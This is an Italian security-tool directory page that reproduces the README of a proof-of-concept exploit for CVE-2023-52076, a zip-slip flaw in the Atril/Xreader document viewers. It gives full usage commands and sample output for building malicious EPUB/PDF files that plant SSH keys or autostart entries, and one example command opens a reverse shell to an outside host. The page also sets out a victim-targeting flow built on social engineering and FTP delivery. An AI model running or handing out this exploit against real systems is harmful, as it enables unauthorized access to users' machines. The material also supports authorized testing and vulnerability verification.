Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-52076-PoC — Exploit PoC per CVE-2023-52076 - path traversal zip-slip in Atril/Xreader (MATE/Cinnamon) che consente la scrittura arbitraria di file e RCE tramite EPUB appositamente predisposti. Solo per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/groppoxx/cve-2023-52076-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingIngegneria SocialeBinary Exploitation
GitHubgroppoxx/cve-2023-52076-poc

CVE-2023-52076-PoC

Exploit PoC per CVE-2023-52076 - path traversal zip-slip in Atril/Xreader (MATE/Cinnamon) che consente la scrittura arbitraria di file e RCE tramite EPUB appositamente predisposti. Solo per test di sicurezza autorizzati.

Vedi Repository
324 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-52076-PoC

Proof-of-concept per CVE-2023-52076, una vulnerabilità critica di path traversal e scrittura arbitraria di file nei visualizzatori di documenti Atril/Xreader che interessano gli ambienti desktop MATE.

Lo script genera un payload EPUB appositamente creato con percorsi zip-slip che mirano alla configurazione SSH o alle voci desktop di autostart, consentendo l'esecuzione remota di comandi sui sistemi presi di mira.

Cosa fa

  1. Supporta due modalità di sfruttamento: iniezione della chiave SSH o RCE tramite autostart.
  2. Genera una coppia di chiavi RSA (solo modalità SSH).
  3. Costruisce un EPUB valido con percorsi zip-slip incorporati che mirano all'estrazione vulnerabile.
  4. Scrive il payload in 5-9 varianti di percorso traversal usando i gadget /proc/self/cwd.
  5. Crea copie .epub e .pdf (entrambe attivano la vulnerabilità).
  6. Valida la struttura del payload e verifica tutte le voci.
  7. Carica facoltativamente il payload tramite FTP anonimo.

Requisiti

root@kitploit:~
Python 3.8+
ssh-keygen in PATH (SSH mode only)

Avvio rapido

Modalità SSH (consigliata)

Genera il payload SSH localmente:

root@kitploit:~
python3 cve_2023_52076.py --mode ssh

Modalità Autostart

Genera il payload RCE autostart con un comando personalizzato:

root@kitploit:~
python3 cve_2023_52076.py --mode autostart --command "id > /tmp/pwned.txt"

Esempio completo

Modalità SSH con upload FTP

root@kitploit:~
python3 cve_2023_52076.py \
  --mode ssh \
  --name slippy-ssh \
  --key ./keys/atril_rsa \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

Output di esempio:

root@kitploit:~
[2026-07-27T14:23:45Z] [*] Generating RSA-3072 keypair: ./keys/atril_rsa
[2026-07-27T14:23:47Z] [*] Building EPUB with 9 zip-slip entries
[2026-07-27T14:23:47Z] [*] Validating payload: ./payloads/slippy-ssh.epub
[2026-07-27T14:23:47Z] [+] Validated 9 payload entries
[2026-07-27T14:23:47Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:23:48Z] [*] Uploading ./payloads/slippy-ssh.epub as slippy-ssh.epub
[2026-07-27T14:23:48Z] [+] Upload complete. Remote directory listing:
-rw-r--r-- 1 0 0 2048 Jul 27 14:23 slippy-ssh.epub

[+] Payload ready
Mode:        SSH (authorized_keys)
Private key: ./keys/atril_rsa (mode 600)
Public key:  ./keys/atril_rsa.pub
Fingerprint: 3072 SHA256:abcd1234... atril-poc (RSA)
EPUB:        ./payloads/slippy-ssh.epub
PDF copy:    ./payloads/slippy-ssh.pdf

[+] SSH login remains manual:
    ssh -i ./keys/atril_rsa -o IdentitiesOnly=yes <user>@<target>

Modalità Autostart con upload FTP

root@kitploit:~
python3 cve_2023_52076.py \
  --mode autostart \
  --command "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" \
  --name slippy-rce \
  --output-dir ./payloads \
  --upload \
  --host ftp.target.local \
  --ftp-dir pub

Output di esempio:

root@kitploit:~
[2026-07-27T14:25:10Z] [*] Building EPUB with 5 zip-slip entries
[2026-07-27T14:25:10Z] [*] Validating payload: ./payloads/slippy-rce.epub
[2026-07-27T14:25:10Z] [+] Validated 5 payload entries
[2026-07-27T14:25:10Z] [*] Connecting to FTP ftp.target.local:21
[2026-07-27T14:25:11Z] [*] Uploading ./payloads/slippy-rce.epub as slippy-rce.epub
[2026-07-27T14:25:11Z] [+] Upload complete.

[+] Payload ready
Mode:       Autostart (.desktop RCE)
Command:    bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
EPUB:       ./payloads/slippy-rce.epub
PDF copy:   ./payloads/slippy-rce.pdf

[+] Victim must logout/login for autostart to trigger

Flag opzionali

root@kitploit:~
--mode {ssh,autostart}
   Payload mode. Default: ssh
   ssh: Inject SSH authorized_keys (no victim interaction needed after file opens).
   autostart: Create .desktop RCE in autostart (triggers on next logout/login).

--command <CMD>
   Payload command for --mode autostart. Required if --mode autostart.
   Example: --command "id > /tmp/pwned.txt"

--name <NAME>
   Local payload basename. Default: base-clean

--key <PATH>
   Private key path (SSH mode only). Default: slippy_rsa

--key-bits <BITS>
   RSA key size (SSH mode only). Options: 2048, 3072, 4096. Default: 3072

--output-dir <DIR>
   Output directory for .epub/.pdf. Default: output

--upload
   Upload the payload to FTP after generating.

--host <HOST>
   FTP target host or IP. Required if --upload is set.

--port <PORT>
   FTP port. Default: 21

--ftp-dir <DIR>
   Remote FTP directory, e.g. pub.

--ftp-user <USER>
   FTP username. Default: anonymous

--ftp-password <PWD>
   FTP password. Default: anonymous@

--remote-name <NAME>
   Remote EPUB filename. Default: ludwig.epub

--upload-pdf
   Upload the .pdf copy instead of the .epub.

--force
   Replace existing output and key files.

--timeout <SECONDS>
   FTP connection timeout. Default: 10.0

--only-final
   Hide progress logs and print only the final summary.

--no-color
   Disable ANSI colors.

--debug
   Print executed subprocess commands (ssh-keygen).

Flusso di sfruttamento

Modalità SSH

  1. Genera il payload: lo script crea un EPUB con la chiave pubblica nei percorsi di authorized_keys.
  2. Ingegneria sociale: invia l'EPUB/PDF al bersaglio (mascherato da ebook).
  3. La vittima apre il file: Atril/Xreader estrae il contenuto dell'EPUB.
  4. Path traversal: il codice vulnerabile scrive la chiave pubblica in ~/.ssh/authorized_keys.
  5. Accesso SSH: l'attaccante si connette usando la chiave privata.

Modalità Autostart

  1. Genera il payload: lo script crea un EPUB con una voce .desktop nei percorsi di autostart.
  2. Ingegneria sociale: invia l'EPUB/PDF al bersaglio.
  3. La vittima apre il file: Atril/Xreader estrae il contenuto dell'EPUB.
  4. Path traversal: il codice vulnerabile scrive il file .desktop in ~/.config/autostart/.
  5. Attivazione: al successivo logout/login, il file .desktop esegue automaticamente il comando.

Punti chiave

  • Nessun nome utente richiesto: il gadget /proc/self/cwd viene risolto al momento dell'estrazione.
  • Molteplici varianti di percorso: 9 percorsi per SSH, 5 per autostart, massimizza il successo a diverse profondità di directory.
  • Nessuna sovrascrittura di file: crea solo nuovi file (rispetta la limitazione della CVE).
  • Modalità offline: genera payload senza consegna FTP (usa --upload solo quando necessario).
  • Comandi flessibili: la modalità autostart supporta qualsiasi comando bash.
  • La modalità SSH è immediata: nessuna interazione con la vittima dopo l'apertura del file.
  • L'autostart richiede un nuovo accesso: la vittima deve fare logout/login per attivare la RCE.

Note

  • Versioni interessate: Atril (MATE DE), Xreader (Cinnamon, Linux Mint) < 1.26.2.
  • Testato su: Kali Linux, Parrot OS, Ubuntu-Mate, Xubuntu.
  • Richiede che la vittima apra il documento appositamente creato in un visualizzatore vulnerabile.
  • Funziona offline; nessuna comunicazione di ritorno verso l'attaccante durante lo sfruttamento.
  • Buona pratica: consegna tramite FTP (--upload) per evitare l'hosting diretto.

Note legali

Questo PoC è pensato per test di sicurezza autorizzati, ambienti di laboratorio e verifica delle vulnerabilità. Non usarlo contro sistemi senza autorizzazione esplicita.

Scarica lo strumento